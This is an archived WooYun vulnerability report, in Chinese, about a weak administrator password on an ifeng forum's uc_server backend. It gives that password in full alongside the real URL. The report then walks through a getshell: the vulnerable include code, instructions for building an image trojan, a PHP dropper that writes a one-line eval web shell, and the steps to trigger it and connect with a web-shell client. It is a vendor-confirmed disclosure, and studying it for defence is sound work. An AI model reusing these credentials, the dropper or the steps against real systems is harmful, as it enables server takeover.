当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-085540

漏洞标题:凤凰网某论坛后台uc_server弱口令可getshell(神器扫的)

相关厂商:凤凰网

漏洞作者: 路人甲

提交时间:2014-12-02 11:37

修复时间:2015-01-16 11:38

公开时间:2015-01-16 11:38

漏洞类型:后台弱口令

危害等级:高

自评Rank:13

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-12-02: 细节已通知厂商并且等待厂商处理中
2014-12-02: 厂商已经确认,细节仅向厂商公开
2014-12-12: 细节向核心白帽子及相关领域专家公开
2014-12-22: 细节向普通白帽子公开
2015-01-01: 细节向实习白帽子公开
2015-01-16: 细节向公众公开

简要描述:

用神器发现凤凰网某论坛后台存在弱口令

详细说明:

http://newbbs.play.ifeng.com/uc_server/admin.php q1w2e3r4
uc_server后台文件包含: WooYun: Discuz UC_Server 本地文件包含漏洞(有条件限制)

function onping() {
$ip = getgpc('ip');
$url = getgpc('url');
$appid = intval(getgpc('appid'));
$app = $_ENV['app']->get_app_by_appid($appid);
$status = '';
if($app['extra']['apppath'] && @include $app['extra']['apppath'].'./api/'.$app['apifilename']) {
$uc_note = new uc_note();
$status = $uc_note->test($note['getdata'], $note['postdata']);


在论坛帖子中上传一张图片木马
http://newbbs.play.ifeng.com/data/attachment/forum/201412/02/120245hir9los3postrbyk.jpg
图片木马制作:copy 1.jpg/b+1.txt/a 2.jpg
图片随便找一张
文本文件内容:

<?php fputs(fopen('f.php','w'),'<?php eval($_POST[f])?>');?>


后台添加应用(这里注意一下路径)

屏幕快照 2014-12-02 下午12.12.19.png


http://newbbs.play.ifeng.com/uc_server/admin.php?m=app&a=ping&appid=【应用id】
在uc_server目录下会生成f.php 密码f
菜刀连接之

漏洞证明:

5CD38008-11E8-4940-B8FF-E902CE6097E3.png


Done ^-^

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2014-12-02 15:06

厂商回复:

谢谢。

最新状态:

暂无